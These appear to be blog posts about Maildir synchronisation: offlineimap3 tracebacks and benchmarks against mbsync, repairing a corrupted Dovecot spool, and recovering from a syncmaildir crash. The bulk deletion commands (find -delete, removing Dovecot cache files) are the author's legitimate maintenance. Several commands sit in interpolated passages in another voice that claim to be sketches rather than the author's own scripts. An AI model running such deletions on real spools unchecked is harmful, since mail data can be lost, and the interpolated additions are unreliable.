  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception:
thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat')
ERROR: Exceptions occurred during the run!
ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
Folder junk [acc: Anarcat]:
 Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk
Command exited with non-zero status 100
5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k
96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps
That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:
 *** Finished account 'Anarcat' in 511:12
ERROR: Exceptions occurred during the run!
ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes).
 AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes).
 AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686'
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap
    raise OfflineImapError(reason, severity)
Command exited with non-zero status 1
8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k
56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps
"offlineimap  -o " took 8 hours 31 mins 15 secs
This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude! Now that we have a full sync, we can test incremental synchronization. That is also much slower:
===> multitime results
1: sh -c "offlineimap -o || true"
            Mean        Std.Dev.    Min         Median      Max
real        24.639      0.513       23.946      24.526      25.708      
user        23.912      0.473       23.404      23.795      24.947      
sys         1.743       0.105       1.607       1.729       2.002
That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I haven't tested that theory. The OfflineIMAP mail spool is missing quite a few messages as well:
anarcat@angela:~(main)$ find Maildir-offlineimap -type f -a \! -name '.*' | wc -l
381463
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l
385247
... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate Those are all the options I have considered, in alphabetical order:
  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync, written in C
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox/NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc.; discarded because there is no (real) support for keeping mail on the server, and it is written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally, Perl
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail; not evaluated because it seems awfully complex to set up, Haskell
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup, Golang
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above, Python
Most projects were not evaluated due to lack of time.

Conclusion I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's par for the course if we use IMAP: we are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response. Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have run out of time on this project.

Antoine Beaupré: The last syncmaildir crash

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post, but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise it again.

The latest crash On Monday, SMD just started failing with this error:
nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.
What is frustrating is that there's actually no network error here. Running the command by hand, I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion. In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes. Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, I gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value"
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578
At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:
while ! mbsync -a; do sleep 1; done

"cached message size larger than expected"
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=)
nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor
This second problem is much harder to fix, because Dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size. I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration, because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things, since the files do not get renamed accordingly.

Workaround So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors (a rough sketch of the idea appears below). The script worked and mbsync was able to sync the entire mail spool. And no, rebuilding the index files didn't work. I also tried doveadm force-resync -u anarcat, which didn't do anything. In the end I also had to do this, because the wrong cache values were also stored elsewhere:
service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start
This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).
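Purely as an illustration of the kind of repair the fix script performs (this is my sketch, not the author's actual script), correcting a wrong S= size field in a Maildir filename could look like this:
# Rewrite the S= field to the file's real size so Dovecot's cached
# size matches again; path taken from the error messages above.
f='Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S'
real=$(stat -c %s "$f")
mv "$f" "$(echo "$f" | sed "s/,S=[0-9]*/,S=$real/")"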

Incoherence between Maildir and IMAP Unfortunately, the first mbsync run was incomplete, as it was missing about 15,000 mails:
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l
384836
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l
369221
As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption. It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:
for folder in * .[^.]* ; do 
  printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l );
done
The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files, but since they are spread across all folders, they were making it impossible to see where the problem was. Here is what the diff looks like:
--- Maildir-list    2021-11-17 20:42:36.504246752 -0500
+++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500
@@ -6,16 +6,15 @@
[...]
 .Archives  1
 .Archives.2010 3553
-.Archives.2011 3583
-.Archives.2012 12593
+.Archives.2011 3582
+.Archives.2012 620
 .Archives.2013 8576
 .Archives.2014 11057
-.Archives.2015 8173
+.Archives.2015 8165
 .Archives.2016 54
 .band  34
 .bitbuck   1
@@ -38,13 +37,12 @@
 .couchsurfers  2
-cur    11285
+cur    11280
 .current   130
 .cv    2
 .debbug    262
-.debian    37544
-drafts 1
-.Drafts    4
+.debian    37533
+.Drafts    2
 .drone 241
 .drupal    188
 .drupal-devel  303
[...]

Misfiled messages It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? actually it does matter: notmuch suddenly found 12,000 new mails) but it definitely matters to Dovecot and therefore to mbsync... Moving those files back into cur/ fixed that part, as sketched below.
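A hedged example of the kind of one-liner that puts the strays back, here for the .Archives.2012 folder (mv -n avoids clobbering anything already in cur/):
# move messages misfiled at the mailbox root back into cur/
find Maildir/.Archives.2012 -maxdepth 1 -type f \! -name '.*' \
    -exec mv -n {} Maildir/.Archives.2012/cur/ \;
After moving those files around, we still have 4,000 messages missing: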
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 
381196
anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 
385053
The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:
 @@ -30,9 +33,29 @@ Slave :anarcat-local:
  # Exclude everything under the internal [Gmail] folder, except the interesting folders
  #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
  # Or include everything
 -Patterns *
 +#Patterns *
 +Patterns * !register  !.register
  # Automatically create missing mailboxes, both locally and on the server
  #Create Both
  Create slave
  # Sync the movement of messages between folders and deletions, add after making sure the sync works
  #Expunge Both
 +
 +IMAPAccount anarcat-register
 +Host imap.anarc.at
 +User register
 +PassCmd "pass imap.anarc.at-register"
 +SSLType IMAPS
 +CertificateFile /etc/ssl/certs/ca-certificates.crt
 +
 +IMAPStore anarcat-register-remote
 +Account anarcat-register
 +
 +MaildirStore anarcat-register-local
 +SubFolders Maildir++
 +Inbox ~/Maildir-mbsync/.register/
 +
 +Channel anarcat-register
 +Master :anarcat-register-remote:
 +Slave :anarcat-register-local:
 +Create slave
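With that channel in place, the register spool can then be synced on its own, using the channel name from the diff above:
mbsync -V anarcat-register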

"tmp" folders and empty messages After syncing the "register" messages, I end up with the measly little 160 emails out of sync:
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 
384900
anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 
385059
Argh. After more digging, I found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, there are even more files, and not the same ones. Possibly those were mails left behind during a failed delivery of some sort, a power failure, or a crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/... The first thing to do with those is to clean up a bunch of empty files (21 on angela):
find .[^.]*/tmp -type f -empty -delete
As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing:
find .[^.]*/tmp -type f | while read path; do
  msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g');
  if notmuch count --exclude=false "id:$msgid" | grep -q 0; then
    echo "$path <$msgid> not in notmuch" ;
  fi;
done
... which is good. Or, to put it another way, this is safe:
find .[^.]*/tmp -type f -delete
Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to apply the same twisted logic there.

notmuch to the rescue again After cleaning that on the client, we get:
anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 
384928
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 
384901
Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l 
385034
anarcat@angela:~(main)$ find Maildir-mbsync -type f -a \! -name '.*' | wc -l 
384993
That is: even more messages missing (now 37). Sigh. Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through. Considering the corruption I found in the mail spool, I wouldn't be the least bit surprised if those messages were just being skipped by the IMAP server. Unfortunately, there's nothing in the Dovecot server logs that would explain the discrepancy. Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:
notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids
notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids
And then we can see how many messages notmuch thinks are missing:
$ wc -l *msgids
372723 Maildir-mbsync-msgids
372752 Maildir-msgids
That's 29 messages. Oddly, it doesn't exactly match the find output:
anarcat@angela:~(main)$ find Maildir-mbsync -type f -a \! -name '.*' | wc -l 
385204
anarcat@angela:~(main)$ find Maildir -type f -a \! -name '.*' | wc -l 
385241
That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely), so the totals actually match. In the notmuch output, there's a lot of stuff like this:
id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4
Those are messages without a valid Message-ID, for which notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those identifiers do not match. There is exactly the same number of them on both sides, however, so I'll go ahead and assume they are all accounted for.
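A quick sanity check that those counts really are equal on both sides, using the two msgid lists generated above:
grep -c sha1 Maildir-msgids Maildir-mbsync-msgids
What remains is: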
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l 
2
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l 
21
anarcat@angela:~(main)$ 
i.e. 21 missing from mbsync and, surprisingly, 2 missing from the original mail spool. Further inspection showed they were all messages with some sort of "corruption": no body, only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.
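For what it's worth, a hedged way to hunt for such header-only messages is to look for files that lack the blank line normally separating headers from body (slow, since it scans the whole spool):
# list messages that have no blank header/body separator line
find Maildir -type f \! -name '.*' -exec sh -c \
    'grep -q "^$" "$1" || printf "%s\n" "$1"' _ {} \;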

Conclusion As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format for its files, and it seems unwise to bypass that. In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect. In other words, just talking to an IMAP server opens up a lot more hosting possibilities than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently, and SMD could have permanently corrupted a significant part of my mail archives. In the end, however, the final straw was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it. In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mailbox corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm. Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

29 June 2021

Antoine Beaupré: Another syncmaildir crash

So I had another major email crash with my syncmaildir setup. This time I was at least able to confirm the issue, and I still haven't lost mail thanks to backups and sheer luck (again).

The crash It is not really worth going over the crash in detail; it's fairly similar to the last one: something bad happened and smd started destroying everything. The hint is that it takes a long time to do what usually takes seconds. It helps that I now have a second monitor showing logs. I still lost much more mail than the last time. I used to have "301 723 messages", according to notmuch. But then when I ran smd-pull by hand, it was telling me:
95K emails scanned
Oops. You can see notmuch happily noticing the destroyed files on the server:
jun 28 16:33:40 marcos notmuch[28532]: No new mail. Removed 65498 messages. Detected 1699 file renames.
jun 28 16:36:05 marcos notmuch[29746]: No new mail. Removed 68883 messages. Detected 2488 file renames.
jun 28 16:41:40 marcos notmuch[31972]: No new mail. Removed 118295 messages. Detected 3657 file renames.
The final count ended up being 81 042 messages, according to notmuch. A whopping 220 000 mails deleted. The interesting bit, this time around, is that I caught smd in the act of running two processes in parallel:
jun 28 16:30:09 curie systemd[2845]: Finished pull emails with syncmaildir. 
jun 28 16:30:09 curie systemd[2845]: Starting push emails with syncmaildir... 
jun 28 16:30:09 curie systemd[2845]: Starting pull emails with syncmaildir... 
So clearly that is the source of the bug.

Recovery Emergency stop on curie:
notmuch dump > notmuch.dump
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
On marcos (the server), I guessed the number of messages delivered since the last backup to be 71, just by looking at timestamps in the mail log. Made a list:
grep postfix/local /var/log/mail.log | tail -71 > lost-mail
Found postfix queue IDs:
sed 's/.*\]://;s/:.*//' lost-mail > qids
Turn those into message IDs, and find those that are missing from the disk (I had previously run notmuch new just to be sure it was up to date):
while read qid ; do 
    grep "$qid: message-id" /var/log/mail.log
done < qids | sed 's/.*message-id=<//;s/>//' | while read msgid; do
    sudo -u anarcat notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid
done
Copy this back on curie as missing-msgids and:
$ wc -l missing-msgids 
48 missing-msgids
$ while read msgid ; do notmuch count --exclude=false id:$msgid | grep -q 0 && echo $msgid ; done < missing-msgids
mailman.189.1624881611.23397.nodes-reseaulibre.ca@reseaulibre.ca
AnwMy7rdSpK-N-vt4AiOag@ismtpd0148p1mdw1.sendgrid.net
only two mails missing! whoohoo! Copy those back onto marcos as really-missing-msgids, and look at the full mail logs to see what they are:
~anarcat/src/koumbit-scripts/mail/postfix-trace --from-file really-missing-msgids2
I actually remembered deleting those, so no mail lost! Rebuild the list of msgids that were lost, on marcos:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids | sed 's/.*message-id=<//;s/>//'
Copy that on curie as lost-mail-msgids, then copy the files over in a test dir:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids | sed 's#/home/anarcat/Maildir/##' | rsync -v --files-from=- /home/anarcat/Maildir/ shell.anarc.at:restore/Maildir-angela/
If that looks about right, on marcos:
find restore/Maildir-angela/ -type f | wc -l
... should match the number of missing mails, roughly. Copy it into the real spool:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids | sed 's#/home/anarcat/Maildir/##' | rsync -v --files-from=- /home/anarcat/Maildir/ shell.anarc.at:Maildir/
Then on the server, notmuch new should find the new emails, and we shouldn't have any lost mail anymore:
